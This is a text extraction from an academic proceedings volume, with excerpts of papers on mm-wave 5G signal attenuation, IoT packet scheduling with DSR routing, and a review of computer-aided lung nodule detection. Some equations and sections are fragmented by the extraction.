plant. In Applications of image processing and soft computing systems in agriculture (pp. 242–
271). IGI Global.
9. Guzman-Plazola, R. A. (1997). Development of a spray forecast model for tomato powdery
mildew (Leveillula Taurica (Lev). Arn.). University of California, Davis.
10. Bhatia, A., Chug, A., & Singh, A. P. (2020). Hybrid SVM-LR classifier for powdery mildew
disease prediction in tomato plant. In 2020 7th International Conference on Signal Processing
and Integrated Networks (SPIN) (pp. 218–223). IEEE.
11. Bhatia, A., Chug, A., & Singh, A. P. (2020). Plant disease detection for high dimensional
imbalanced dataset using an enhanced decision tree approach. International Journal of Future
Generation Communication and Networking, 13(4), 71–78.
12. Bhatia, A., Chug, A., & Singh, A. P. (2020). Application of extreme learning machine in
plant disease prediction for highly imbalanced dataset. Journal of Statistics and Management
Systems, 23(6), 1059–1068. https://doi.org/10.1080/09720510.2020.1799504
13. Ghaffari, R., Zhang, F., Iliescu, D., Hines, E., Leeson, M., Napier, R., & Clarkson, J. (2010).
Early detection of diseases in tomato crops: an electronic nose and intelligent systems approach.
In The 2010 International Joint Conference on Neural Networks (IJCNN) (pp. 1–6). IEEE.
14. Rumpf, T., Mahlein, A.-K., Steiner, U., Oerke, E.-C., Dehne, H.-W., & Plümer, L. (2010).
Early detection and classification of plant diseases with support vector machines based on
hyperspectral reflectance. Computers and Electronics in Agriculture, 74(1), 91–99.
520 A. Bhatia et al.
15. Prince, G., Clarkson, J. P., & Rajpoot, N. M. (2015) Automatic detection diseases tomato
plants using thermal stereo visible light images. PLoS One, 10(4), e0123262.
16. Mokhtar, U., Ali, M. A. S., Hassenian, A. E., & Hefny, H. (2015). Tomato leaves diseases
detection approach based on support vector machines. In 2015 11th International Computer
Engineering Conference (ICENCO) (pp. 246–250). IEEE.
17. Vishwakarma, V. P., & Dalal, S. (2020). A novel non-linear modifier for adaptive illumination
normalization for robust face recognition. Multimedia Tools and Applications, 1–27.
18. Kotsiantis, S. B. (2013). Decision trees: A recent overview. Artificial Intelligence Review, 39(4),
261–283.
19. Liaw, A., & Wiener, M. (2002). Classification and regression by randomForest. R news, 2(3),
18–22.
20. Sabrol, H., & Kumar, S. (2016). Intensity based feature extraction for tomato plant disease
recognition by classification using decision tree. International Journal of Computer Science
and Information Security, 14(9), 622.
Investigate the Effect of Rain, Foliage,
Atmospheric Gases, and Diffraction
on Millimeter (mm) Wave Propagation
for 5G Cellular Networks
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 521
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_42
522 A. Tripathi et al.
To fulfill the challenges of a rising need for higher rates of data, larger network
infrastructure, and greater spectral efficiency, 5G cellular networks is introduced
recently. The data capacity is significantly improved via increasing the bandwidth of
the channel for different services to support high-speed Internet-based connectivity
and minimally latency-requiring applications [1]. The millimeter (mm) wave will be
used in a substantial way to satisfy the requirement for large bandwidth. At the mm-
wave propagation, atmospheric losses between 28 and 38 GHz do not significantly
add more loss to the path loss that is considered lead to communications for 5G but
in the higher frequency range of mm-Wave, atmospheric absorption occurs which is
used for 5G connectivity deployment in near future. Propagation studies have been
carried out to test the impact of total path loss at 28 and 38 GHz and that only for the
consequences of rain fading at mm-wave band. For the better deployment of the 5G
mobile network in the future, there is a requirement of evaluating the effect of rain,
foliage, and other atmospheric attenuation on the output of the cellular mm-wave
system for higher frequency ranges. These groups have certain constraints like these
cannot travel significant distances and cannot enter structures and different items.
These restrictions can be profitably misused to give safer correspondence and grant
high-frequency reuse [2–5].
This paper finds the engendering attributes of mm-Waves and the impact of outer
elements like air gases, rain, foliage, and diffraction and proposed data-driven compu-
tational intelligence-based generic framework to optimize quality of service (QoS)
parameters such as bandwidth and path loss. Our fundamental focus will be to
consider the impact of these components on the spread of mm-Wave frequencies
to be utilized for 5G cell organizations. We assess the attenuation because of envi-
ronmental gases, rain, and foliage at different mm-Wave frequencies which should
be utilized in 5G cell organizations.
Our investigation has done by simulating using MATLAB and use ITU-R P.676–
10 models to calculate attenuation due to fog, rain, and atmospheric gases.
Millimeter (mm) Wave Propagation—The mm-wave communication systems are
widely used in today ‘s world which provides solutions with restricted bandwidth
with high-demand superior data rate for mobile communications. Mm-Waves are
waves having wavelengths ranges from 1 to 100 mm with bandwidth up to 10 Gbit/s
[6]. This band has the potential to fulfill the requirements of 5G communications [7].
In the literature, various researchers have been studied the effect of the atmospheric
fading only for few frequency bands of mm-Wave but we consider the whole mm-
Wave band. The 5G is started in 2006 by China with a 59 –64 GHz RF band [8].
Furthermore, RF bands range 40.5–42.3 GHz and 48.4–50.2 GHz, used for light
license management, while for communication, unlicensed management RF bands
range 42.3–47 GHz and 47.2–48.4 GHz are used [8]. In 2010, the Chinese wireless
personal access network (CWPAN) standard working group, set up ITU-T Study
Group 5 (SG5), also called SG5 QLINKPAN, to investigate the feasibility of a 45 GHz
RF band for different application. In China, the issued 60 GHz involves of 5 GHz
Investigate the Effect of Rain, Foliage, Atmospheric Gases … 523
of the contiguous, mm-Wave at 59–64 GHz band. Early 2017, South Korea issued a
national broadband plan which suggests the possibility to extend the spectrum in the
28 GHz band by up to 2 GHz to provide access to a total of 3 GHz, 26.5–29.5 GHz.
In 2018, South Korea decided to own an auction of mm-Wave 5G with 2400 MHz
bandwidth in the 28 GHz band for three mobile operators [9, 10]. In late 2018, the
three national mobile network operators (MNOs) initiated 5G technology having
mobile hot spots in South Korea (SK Telecom, Korea Telecom (KT), and LGU + ).
The main contribution of this paper is to investigate the effect of rain, fog, cloud, and
atmospheric gases on the whole frequency range at different atmospheric conditions;
apart from this, we suggest a computational framework. After the introduction, this
paper is systematized as follows. Section 2 analyzes the effect due to atmospheric
gas. Section 3 analyzes the effect due to fog and cloud. Section 4 analyzes the effect
due to rain. Section 5 discusses the proposed generic framework with a simulation
study. Finally, this paper is concluded in Sect. 6, and a few outlines are highlighted
as the future scope and work.
This signal’s attenuation which propagates through gases present in the atmosphere
is computed. Electromagnetic (EM) signals weaken when they engender through
the atmosphere. This impact is expected basically to the resonance lines of oxygen
and water vapor, with small loss due to nitrogen gas [11]. The model additionally
incorporates a ceaseless retention range under 10 GHz. For frequencies ranging
from 1–1000 GHz and applying to polarized and non-polarized fields, this model is
available. The equation for this model with specific attenuation at each frequency is
given by Eq. 1
γ = γo ( f ) + γw ( f ) = 0.1820 f N ( f ) (1)
where N"() is the imaginary part of the complex number and contains a continuous
part and a spectral line is given by Eq. 2
N (f) = Si Fi + N D ( f ) (2)
i
524 A. Tripathi et al.
Each spectral line intensities are given by Eq. 4 for atmospheric water vapor.
3.5
300 300
Si = b1 × 10−1 exp b2 1 − ( W (4)
T T
ρT
W = (5)
216.7
P + W is total atmospheric pressure.
To calculate the overall attenuation for narrowband signals on a path, the mathe-
matical relation increases the specific attenuation by the length of the path, R. Then,
the overall attenuation is L g = R(γo + γw ).
In this model, different function applies the cloud and fog attenuation model of the
“International Telecommunication Union (ITU)” to measure the attenuation due to
cloud and fog of signal propagation. Model based on parameters which are signal
path length, signal frequency, liquid water density, and ambient temperature. This
feature refers to instances where the direction of the signal is completely contained
in a uniform fog or cloud environment. Along the signal path, the density of liquid
water does not differ.
Investigate the Effect of Rain, Foliage, Atmospheric Gases … 525
The attenuation of signals that spread through fog or clouds is determined by this
model. ITU model, ITU-R P.840–6 Recommendation: The model measures the real
attenuation (dB/km) of the signal in polarized and non-polarized fields [12]. The
expression for specific attenuation at every frequency is given by Eq. 6
γc = kl ( f )M (6)
where
γR = k Rα (7)
where
The parametric quantity k and exponent α depends on the signal path’s frequency,
angle of elevation, and condition of polarization.
The effective propagation distance,deff. and real attenuation multiplies in this equa-
tion to calculate the overall attenuation for narrowband signals along a path. Then, L
= deff γ R is the absolute attenuation.
The efficacious distance is a product of geometrical distance, d, and scale
component
1
r= (8)
0.477d 0.633R0.01 f 0.123 − 10.579(1 − exp(−0.024d))
0.73a
where
f frequency
In this section, we describe our simulation work is done. We obtain the attenuation
due to atmospheric gases, clouds, and rain at different rain rates [16, 17]. We have
divided the whole mm-Wave band into different frequency range to understand the
result easily. First, we investigate the attenuation due to atmospheric gases, divided
the whole mm-Wave into 20–50 GHz, 50–100 GHz, 100–200 GHz, and 200–300Ghz
band to examine the result easily. Proposed framework—Based on previous data
analysis and collection data-driven, framework will be proposed in the future which
will optimize required quality of service (QoS) parameters.
The framework is as follows.
General framework using computational intelligence:
Investigate the Effect of Rain, Foliage, Atmospheric Gases … 527
In Fig. 1, the graph shows the attenuation for frequency range 20–50 GHz, and
there are two lines in the graph one is blue other one is red. Blue lines are showing
the absorption due to oxygen and air with water density of 7 g/m3 and the red line
showing attenuation due to oxygen and dry air which has zero water density. They
clearly show that signal attenuation due to air with water density than the dry air. In
the frequency range 20–50 GHz, attenuation is not significantly high but in Fig. 2,
it clearly shows that at 60GHz, attenuation is 14.65 dB which is not suitable for 5G
cellular networks. In Fig. 3, there are two peaks in the graph at frequency 120 GHz
where specific attenuation 2 dB which is not stressful but at frequency 183 GHz loss
528 A. Tripathi et al.
due to atmospheric gases is 28.34 dB which is significantly high. Figure 4 shows the
graph for 200–300 GHz frequency, where the losses are not very fluctuating.
After investigating attenuation due to atmospheric gases, we investigate the effect
of fog and cloud and calculate the attenuation of signals that spread through a cloud
Investigate the Effect of Rain, Foliage, Atmospheric Gases … 529
Fig. 6 Rain attenuation for frequency 20–300 GHz at rain rate 10 mm/hr
Fig. 7 Rain attenuation for frequency 20–300 GHz at rain rate 15 mm/hr
532 A. Tripathi et al.
Fig. 8 Rain attenuation for frequency 20–300 GHz at rain rate 20 mm/hr
the future, we will develop different data-driven and mathematical models to address
the problem using computational intelligence frameworks.
References
1. Rappaport, T., et al. (2013). Millimeter wave mobile communications for 5Gcellular: It will
work! IEEE Access, 1, 335–349.
2. Marcus, M., & Pattan, B. (2005). Millimeter wave propagation: Spectrum management
implications. IEEE Microwave Magnetic, 6(2), 54–62.
3. Pi, Z., & Khan, F. (2011). An introduction to millimeter-wave mobile broadband systems.
Communications Magazine, IEEE, 49(6), 101–107.
4. Wheeler, Tom. “Leading Towards Next Generation “5G” Mobile Services”. Federal Commu-
nications Commission. Federal Communications Commission. Retrieved 25 July2016.
5. Yong, L., Depeng, J., Li, S., & Athanasios, V. V. (2015). A survey of millimeter wave (mmWave)
communications for 5G: opportunities and challenges (pp. 1–20)
6. Rappaport, T. S. et al. (2015) In Millimeter wave wireless communications. Pearson Education.
7. Uwaechia, A. N., & Mahyuddin, N. M. (2020). A comprehensive survey on millimeter
wave communications for fifth-generation wireless networks: feasibility and challenges. IEEE
Access, 8, 62367–62414.
8. Haiming, W., Wei, H., Jixin, C., Bo, S., & Xiaoming, P. (2014). IEEE 802.11aj (45 GHz):
A new very high throughput millimeter-wave WLAN system. China Communications, 11(6),
51–62.
9. Kürner, T., & Priebe, S. (2014). Towards THz communications-status in research standardiza-
tion and regulation. Journal Infrastructure Millimeter THz Waves, 35(1), 53–62.
10. Current 5G Commercial Network Including Current 5G Research (2019, December 12) 5G
Field Testing/5G Trials, and 5G Development by Country.
Investigate the Effect of Rain, Foliage, Atmospheric Gases … 533
1 Introduction
In today’s era, ongoing requirements of mobile data collection within the IOT-enabled
networks place challenges in designing energy efficient networks, communication
types, topology of network, and scheduling packets for effective data delivery.
Some of structures and deployments of nodes are suggested [1–3]. Looking into
the daily requirements, there is a tremendous growth in multimedia devices. These
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 535
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_43
536 S. Kurumbanshi et al.
devices produces data which is useful in designing sensors for IOT-enabled networks.
Number of sensors connected to IOT networks have reached almost 24 billion in 2020
[4, 5].
The sensors generate data from various collection units such as bridge, roads, and
street lamps. Therefore, collecting multimedia data from nodes becomes an important
concern in the IoTs. Limited delivery range of the sensor will neither satisfies the
user demands nor does it provide supports for the multimedia enabled big data
applications. Deployment of data sensors and deploying its related communication
technologies requires high cost. One of effective way to address this issue is to deploy
mobile nodes scenario for data collection and transmits the multimedia data while
moving [6]. The hybrid protocols (HWMP) have been developed operating at layer 2
in the IEEE standard. It includes mesh points which are connected to gateways which
are more efficient in avoiding congestion of the network [7]. Load balancing method
reduces congestion effectively in networks. In wireless mesh networks, traffic is
distributed to various paths having least congestion and achieves better performance
[8, 9]. Some of routing methods are suggested to balance the routing load and improve
link quality for the the ad hoc networks. [10–15].
In multi-path routing mechanisms, routing metrics are suggested considering the
quality of wireless link [16, 17], energy of neighboring nodes and interference [18],
AOMDV (QLB-AOMDV) and QOS in [19], and load balanced congestion adaptive
routing in [20]. These routing algorithms having higher overheads and are suitable
for ad hoc network in moving nodes.
2 Related Work
using NS 2, and it proves that OECP has higher packet delivery ratio with lower
energy consumption and end to end delay [23].
For quick changing topology, RPL-based IOT network is proposed to reduce the
power consumption. Mobility level for a node is defined in RPL network to estimate
the movement of neighboring node. The node does the adjustment of the interval of
control messages depending on the mobility level value. This way allows path will
be updated, and it helps to reduce the power consumption.
3 Methodology
Looking into the ongoing demand of IOT-enabled network and various advancements
of mobile networks, it is needed to propose energy efficient battery management tech-
nique. We propose mobile ad hoc network for grid scenario in which scheduling of
packets is controlled using Pareto and exponential distribution, while setting interar-
rival time between packets. In the proposed network, probability distribution func-
tion and cumulative distribution functions are derived for Pareto and exponential
functions. Cumulative distribution function of Pareto distributed traffic and expo-
nentially distributed traffic has uniform energy density. Due to this reason, packets
are scheduled uniformly with less consumption of energy.
Figure 1 shows the proposed methodology of packet scheduling algorithm where
networks of varying node scenario are tested using DSR and proposed DSR with
Pareto and DSR with exponential distribution. Packet delivery and residual energy
of the proposed algorithm are compared with existing DSR protocol.
Fig. 1 Proposed
methodology
538 S. Kurumbanshi et al.
Algorithm
4 Results
Networks are proposed for mobile nodes to observe and test the performance of
packet scheduling algorithm for packet delivery and residual energy of network.
Ad hoc network is set for 50 moving nodes in grid scenario with the configuration
parameters specified in Table 1. Network density is varied from 10 to 50 nodes.
Network is simulated for 10 s in NS2. Network is tested for various performance
parameters for DSR, DSR with Pareto, and DSR with exponential arrival pattern of
packets as explained in Table 4. Figure 2 shows the network set up for 50 mobile
nodes in grid scenario. Network topography is configured for 4700¿ 472 m. Network
is simulated for 10 s. Node movements are also created with pause time as 10 s and
velocity as 20 m/second for nodes n0, n1, n2, n3, n4, n5, n6, n7, n8, n9, n20, n21,
n22, n23, n24, n25, n26, n27, n28 and n29 (Tables 2 and 3).
Performance of the network is tested for 50 mobile nodes with DSR, DSR with
Pareto, and DSR with exponential method as discussed in Table 4. Results show that
packet delivery of the network is improved from 93.58 to 95.55% in case of DSR
with Pareto with good amount of residual energy. Also packet delivery is improved
from 93.58 to 97.54% with exponential distribution and improvement in residual
energy from 4.05 to 4.14 J.
Packet Scheduling Algorithm to improvise the Packet Delivery … 539
Table 1 Configuration
Sr. No Parameter Value
parameters for wireless ad
hoc network 50 mobile nodes 1 Channel Wireless channel
in grid topology 2 Propagation Two ray
ground
3 MAC 802_11
4 Antenna Omni antenna
5 Number of nodes 50
6 IFQ length 50
7 Routing protocol DSR
8 X(m) 4007
9 Y(m) 100
10 Simulation time(s) 10.0
11 Initial energy (J) 5
12 Txpower (W) 0.9
13 Rxpower (W) 0.8
14 Sensepower (W) 0.0175
15 Idle power (W) 0.0
Table 3 Parameters of
Sr. No Parameter Value
exponential distribution for
50 nodes 1 PKT size 100
2 Burst time (ms) 500
3 Idle time (ms) 500
4 Rate (K) 1
Table 4 Performance comparison of DSR, DSR with Pareto, and DSR with exponential for 50
nodes
Sr.No Parameter Value for DSR Value for DSR with Value for DSR with
Pareto Expo
1 Number of packets 1667 1545 1665
send (Bytes)
2 Number of packets 1590 1482 1624
received (Bytes)
3 PDR (%) 93.58 95.95 97.54
4 Total energy 46.25 46.85 41.42
consumption (Joule)
5 Average energy 94.39 0.95 0.85
consumption (Joule)
6 Overall residual 198.7 196 203.04
energy (Joule)
7 Average residual 4.05 4.04 4.14
energy (Joule)
Figure 3 shows the NAM file deployed for 40 mobile nodes. Network topography
is set for 5894 ¿428 m. Network is simulated for 10 s. Node movements are also
created with pause time as 10 s and velocity as 20 m/second for nodes n0, n1, n2,
n3, n4, n5, n6, n7, n8, n9, n20, n21, n22, n23, n24, n25, n26, n27, n28, and n29.
Performance of the network is tested for 40 mobile nodes with DSR protocol, DSR
with Pareto, and DSR with exponential approach is specified in Table 5.
It shows that packet delivery is improved from 67.02 to 89.22% in case of DSR
with Pareto approach, and residual energy is improved from 3.74 to 4.05 J. Also
packet delivery of the network is improved from 67.02 to 83.37% for DSR with
exponential approach, and residual energy is improved from 3.74 to 3.96 J.
5 Conclusion
In this paper, a novel packet scheduling algorithm is proposed to improve the packet
delivery ratio and residual energy of IOT-enabled networks. In contrast to the previous
Packet Scheduling Algorithm to improvise the Packet Delivery … 541
Table 5 Performance parameters for DSR, DSR with Pareto, and DSR with exponential for 40
mobile nodes in mobile scenario
Sr Parameter Value for DSR Value for DSR with Value for DSR with
Pareto exponential
1 Number of packets 1331 1568 1684
send(Bytes)
2 Number of packets 892 1399 1404
received(Bytes)
3 PDR (%) 67.02 89.22 83.37
4 Total energy 49.08 36.91 40.14
consumption (Joule)
5 Average energy 1.25 0.946 1.029
consumption (Joule)
6 Overall residual 145.892 158.06 154.83
energy (Joule)
7 Average residual 3.74 4.05 3.96
energy (Joule)
542 S. Kurumbanshi et al.
studies, our scheme combines traffic data scheduling with proposed Pareto and expo-
nentially distributed traffic to form a routing policy. Packet delivery of the network is
improved around 17% than normal routing using DSR. Energy saving is done even at
a higher packet delivery ratio of the network. Packets scheduling is done uniformly
using cumulative distribution function, and energy parameters is proportional to
cumulative distribution function so does energy saving using proposed approach.
References
1. Ang, L.-M., Seng, K. P., Zungeru, A. M., & Ijemaru, G. K. (2017). Big sensor data systems
for smart cities. IEEE Internet of Things Journal, 4(5), 1259–1271.
2. Liu, X., Liu, Y., Liu, A., & Yang, L. (2019) Defending on-off attacks using light probing
messages in smart sensors for industrial communication systems. IEEE Transactions Industrial
Information, to be published. https://doi.org/10.1109/TII.2018.2836150
3. Feng, T.-H., Li, W. T., & Hwang, M.-S. (2015). A false data report filtering scheme in wireless
sensor networks: A survey. International Journal Network Security, 17(3), 229–236.
4. Huang, M., Liu, A., Xiong, N. N., Wang, T., & Vasilakos, A. V. (2018). A low-latency commu-
nication scheme for mobile wireless sensor control systems. In IEEE Transactions Systems
Management Cybernetics Systems, to be published. https://doi.org/10.1109/TSMC.2018.283
3204
5. Shen, V. R. L., Shen, R.-K., & Yang, C.-Y. (2016). Cost optimization of a path protection system
with partial bandwidth using petri nets. Wireless Personal Communications, 90(3), 1239–1259.
6. Li, T., Tian, S., Liu, A., Liu, H., & Pei, T. (2018). DDSV: optimizing delay and delivery ratio
for multimedia big data collection in mobile sensing vehicles. IEEE Internet of Things Journal,
5(5).
7. Hu, M., Zhang, J., & Yue, G. (2010). A novel load balancing scheme for hybrid routing protocol
in IEEE 802 11 mesh networks. In 3rd IEEE International Conference Broadband Networking
Multimedia Technology (pp. 664–648).
8. Jung, W. J., Lee, J. Y., & Kim, B. C. (2014). Joint link scheduling and routing for
load balancing in STDMA wireless mesh networks. International Journal Communications
Networks Information Security, 6(3), 246–252.
9. Nguyen, L. T., Beuran, R., & Shinoda, Y. (2008). A load-aware routing metric for wireless
mesh networks. IEEE Computers and Communications (ISCC), 429–435.
10. Chen, J., Li, Z., Liu, J., & Kuo, Y. (2011) QoS multipath routing protocol based on cross layer
design for ad hoc networks. In 2011 International Conference Internet Computing Information
Services (Vol 1, no. 2, pp. 261–264).
11. Gopalan, N. P. (2009). A QoS-based robust multipath routing protocol for mobile adhoc
networks. In First Asian Himalayas International Conference Internet 2009, AH-IC.
12. Ktari, S., Labiod, H., & Frikha, M. (2006). Load balanced multipath routing in mobile ad hoc
network. In 10th IEEE Singapore International Conference Communications Systems. ICCS
2006 (pp. 1–5).
13. Maleki, H., Kargahi, M., & Jabbehdari, S. (2014). RTLB-DSR: a loadbalancing DSR based
QoS routing protocol in MANETs. In Proceedings 4th International Conference Computing
Knowledge Engineering ICCKE 2014 (pp. 728–735).
14. Mallapur, S. V., Patil, S. R., Agarkhed, J. V. (2015). Multipath load balancing tech nique for
congestion control in mobile ad hoc networks. In 2015 Fifth International Conference Advanced
Computing Communications (pp. 204–209).
15. Yamaguchi, K., Nagahashi, T., Akiyama, T., Yamaguchi, T., & Matsue, H. (2016). A routing
based on OLSR with traffic load balancing and QoS for Wi-Fi mesh network. In International
Conference Information Networking vol. 2016–March (pp. 102–107).
Packet Scheduling Algorithm to improvise the Packet Delivery … 543
16. Gomez, K., Riggio, R., Rasheed, T., & Chlamtac, I. (2011). On efficient airtime—based fair link
scheduling in IEEE 802. 11-based wireless networks. In IEEE 22nd International Symposium
Personality Indoor Mobility Radio Communications (pp. 930–934).
17. Javaid, N., Ahmad, A., Imran, M., Alhamed, A. A., & Guizani, M. (2016). BIETX: a new
quality link metric for static wireless multi-hop networks. In 2016 International Wireless
Communications Mobile Computing Conference IWCMC, (Vol 1, pp. 784–789).
18. Sujatha, A. D., Terdal, P., Mytri, V. D. (2012). A link quality based dispersity routing al gorithm
for mobile ad hoc networks. International Journal of Computer Network and Information
Security (IJCNIS). [Online] Available http://www.mecspress.org/ijcnis/ijcnis-v4-n9/v4n9-3.
html
19. Tekaya, M., Tabbane, N., Tabbane, S., & Supérieure, E. (2010). Multipath routing with load
balancing and QoS in ad hoc network. 10(8), 280–286.
20. Kim, J., Tomar, G. S., Shrivastava, L., Bhadauria, S. S., & Lee, W. (2014) Load balanced
congestion adaptive routing for mobile ad hoc networks. (Vol. 2014).
21. Noorani, N., & Seno, S. A. H. (2018). Routing in VANETs based on in tersection using SDN
and fog computing. In 8th International Conference on Computer and Knowledge Engineering
(ICCKE 2018), October 25–26, Ferdowsi University of Mashhad.
22. Khoza, E., Tu, C., & Adewale Owolawi, P. (2018). An ant colony hybrid routing protocol for
VANET, 6–7 December.
23. Lakshmi Prabha, K., & Selvan, S. (2019). Optimal energy consumption protocol to improve Qos
in delay tolerant networks. In 2019 1st international Conference on Innovations in Information
and Communication Technologies.
Abstract Cancer is one of the leading causes of mortality worldwide, lung cancer
being one of the deadliest. Early detection and accurate diagnosis of lung nodules
can save many lives and resources. Number of diagnostic radiology utilized for
detection of lung nodules of which computed tomography (CT) scans provide better
discernment of disease, thus explored extensively for the automatic nodule analysis.
However, manual analysis of radiological images is time-consuming and prone to
human errors like detection and interpretation errors. On the other hand, computer-
aided detection and diagnosis (CAD) system eliminates manual process and problems
associated with it. In this work, an analytical review on various CAD systems for
detection and characterization of lung nodules using CT scan images is discussed.
A detailed structure of each component of CAD system is presented. Diverse CAD
systems which are developed on the basis of state-of-the-art convolutional neural
networks (CNN), such as 3D-CNN, transferable CNN, dense convolutional binary
tree network, gated dilated network, and mask region CNN, are addressed. The
algorithms performance is compared based on metrics: sensitivity (SEN), accuracy
(ACC), area under curve (AUC), etc. In order to develop more robust end-to-end
system, coupling between detection and diagnostic components is also explored.
Finally, current challenges faced in analysis and characterization of lung nodule by
the present system and future research opportunities in this field are discussed.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 545
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_44
546 N. Ali and J. Yadav
1 Introduction
Cancer is abnormal growth of cell which can spread to different body parts. Tumors
or neoplasm are lump or mass of tissue, and it can either be cancerous (malignant)
or non-cancerous (benign). According to 2020 WHO report on cancer, 18.1 million
people had cancer around the world, 9.6 million death caused by it, and the estimated
numbers will double by 2040. The most frequently diagnosed cancer is lung cancer
(11.6% of all cases) with mortality rate of 18.6% of all cases [1]. Lung cancer can be
grouped into two types, namely non-small cell lung cancer (NSCLC) and small cell
lung cancer (SCLC). Compared to NSCLC, SCLC grows and spreads quickly. In
most of the cases, it is observed that, till the time it is diagnosed, cancer has already
spread. Especially for this type of situation, early detection is very crucial. CAD
system can be employed in order to efficiently detect and diagnose cancer. The main
requirement of such system is high accuracy, sensitivity, and low false positives.
Lung nodule analysis is most effective cancer prevention which broadly consists
of two steps, namely nodule detection and classification into cancerous and non-
cancerous [2]. Due to the complexity of lung nodules based on its shape, size (3–
30 mm), density (solid, semi-solid, ground glass opacity), location (central, juxta-
pleural, juxta-vascular), it is hard to generalize any specific categories [3, 4]. This
variability in nodule characterization makes diagnosis a difficult task. However, most
studies suggest that large size nodules (diameter more than 8 mm), semi-solid, and
lobulated are more certainly malignant [5, 6]. Effective screening and correct inter-
pretation of lung cancer are crucial step toward early diagnosis. Advancement in
computed tomography (CT) imaging technique and screening with low-dose CT
(LDCT) has shown promising improvement in nodule detection.
With immense popularity of LDCT screening and increase in CT scans, the job
of radiologist becomes more difficult, as manual analysis of volumetric CT scans is
time-consuming and also prone to interpretation and detection errors. In order to facil-
itate workload of radiologists, an automatic computer-aided detection and diagnosis
system is necessary. CAD system is one of the effective cancer control interven-
tions, which is helpful in early detection of malignancy and classification [7]. There
has been extensive research done on various models and algorithm of CAD system
in order to make it more efficient in terms of disease detection and classification.
Typical CAD system can be grouped into two: computer-aided detection (CADe)
system and computer-aided diagnosis (CADx) system. CADe system aims at nodule
localization, whereas CADx designed to determine whether suspicious candidate is
benign or malignant and categorize its type. Specifically, a CAD system consists
of four stages: preprocessing, nodule identification, feature extraction/selection, and
nodule classification [8, 9].
In this review, first structure of CAD system is briefly presented with various
algorithms developed for each component. Also, some of the efficient state-of-the-art
CNN schemes such as 3D-CNN (feature extraction using residual network) [10], V-
Net [11], transferable texture CNN [12], U-Net [13], faster region CNN (RCNN) [14],
mask-RCNN [15], RetinaNet (R-Net), Inflated 3D R-Net (I3DR-Net) [16], and Leaky
Computer-Aided Detection and Diagnosis of Lung Nodules … 547
Integrate and Fire Networks (LIF-Nets) [17] are also explored. Compared to tradi-
tional machine learning algorithms, deep learning has shown significant improve-
ment with respect to nodule identification and characterization. The main aim of this
review is to explicitly present each component along with reliable algorithms devel-
oped in the respective domain, as described in Fig. 1. The experimental benchmarks
necessary for the research work in this field like database and evaluation metrics
are also emphasized. Finally, existing challenges faced by CAD system in accurate
diagnosis of lung nodule, research trends, and future developments in CAD system
are discussed.
The work is divided into four sections: First section describes the anatomical struc-
ture of CAD system along with various algorithms developed, in second section,
experimental benchmark is mentioned, in the third section, the algorithms and
methods that we have surveyed are compared, and in last section, a brief conclusion
is provided with future research prospect.
CAD system is broadly categorized into two modules, one used for nodule detection
and localization called computer-aided detection (CADe) system and other used for
classification of detected nodule into cancerous and non-cancerous called computer-
aided diagnosis (CADx) system [18]. In order to be applicable to clinical diagnosis
and reduce radiologist workload, these systems have to be combined to perform as
end-to-end system which does the complete work of detection and classification of
lung cancer [2].
CADe system for detection of nodule using CT scans can be divided into two
parts, first part basically consists of image processing component: Preprocessing:
lung segmentation and nodule enhancement, nodule detection: Initial nodule identi-
fication and nodule segmentation [15, 19], and second part consists of feature anal-
ysis components [20]. Aim of image processing component is to detect, i.e., localize
and segment suspicious regions in CT images with high sensitivity, and as a result,
false positive also increases. Whereas, feature analysis components purpose is to
reduce false positive by analyzing features of nodules by maintaining high detec-
tion sensitivity. For example, FP is reduced by varying slab thickness in maximum
intensity projection (MIP) images [21]. CADx schemes developed to categorize
detected nodule into benign or malignant [22–24]. The input provided to this system
is nodule location, which can be fed manually or by coupling with CADe system.
Generally, CADx system involves following stages: Nodule segmentation [25, 26],
feature engineering/learning: Feature extraction/selection, nodule classification [27].
CNN-based network shows better result than traditional machine learning methods.
The end-to-end CAD systems consist of combination of CADe and CADx
schemes [16, 28], with components as shown in Fig. 2. System that only detects
nodule and not characterizes them is not enough for clinical application, and thus,
a complete CAD system which performs end-to-end detection and classification is
necessary. In the next section, components of CAD system are extensively covered.
2.1 Preprocessing
The input images which are fed into the system are processed images, as CT images
are 3D images and defiled by noise and artifacts [25]. In order to eliminate noises and
enhance contrast, preprocessing is done. Preprocessing in general is image processing
stage which basically performs tasks such as noise elimination [28], lung segmen-
tation, and mending lung contour [20, 29, 30] nodule enhancement [19, 31]. CT
scan images consists of two types of noises: First type is radiographic noises which
are caused due to electronic elements, and the second type is anatomical noises.
Anatomical noise is caused due to projection of local anatomical structures like ribs,
pulmonary vessels on chest scans, which makes nodule detection a difficult task.
In order to reduce noise and enhance nodule-like structures, CT images are fed
through filters, commonly used are median filter, Gaussian filter [32], dot enhance-
ment filter, NLM filter, histogram equalization, and adaptive Wiener filter [33]. Data
augmentation is crucial while training the model, and it helps to reduce overfit-
ting, thus maximizing transfer learning. Ozdemir et al. [2] performed transform
augmentation consisting of 3D rotation, reflection, and 3D scaled samples.
Lung segmentation: Nodules are present within lung, so in order to perform
nodule detection, first requirement is to segment lung. The steps involved in lung
segmentation are described in Fig. 3.
Kuo et al. [19] first optimized the images using adaptive Wiener filter, and then,
lung segmentation is performed using fast Otsu algorithm along with edge search
method which is identical to hole-filling and histogram shifting method. Rey et al.
[20] applied Otsu algorithm based lung segmentation, used morphological closing
operator for filling interior lung cavities and 3D region growing algorithm is used
for lung solation. Zhang et al. [29] performed four steps to extract lung parenchyma,
first step is histogram-based threshold segmentation used to obtain various gray
levels for lung mask generation, next step is removing anatomical noise also padding
operator used for hole-filling, third step is lung contour mending to include juxta-
pleural nodules, which otherwise gets eliminated, and the last step is that correct lung
parenchyma contour is segmented. Gong et al. [34] adopted Otsu threshold segmen-
tation method, to segment and extract lobes of lung 3D region growing algorithm
applied. Gong et al. [13] obtained lung region mask by using convex hull and dilation
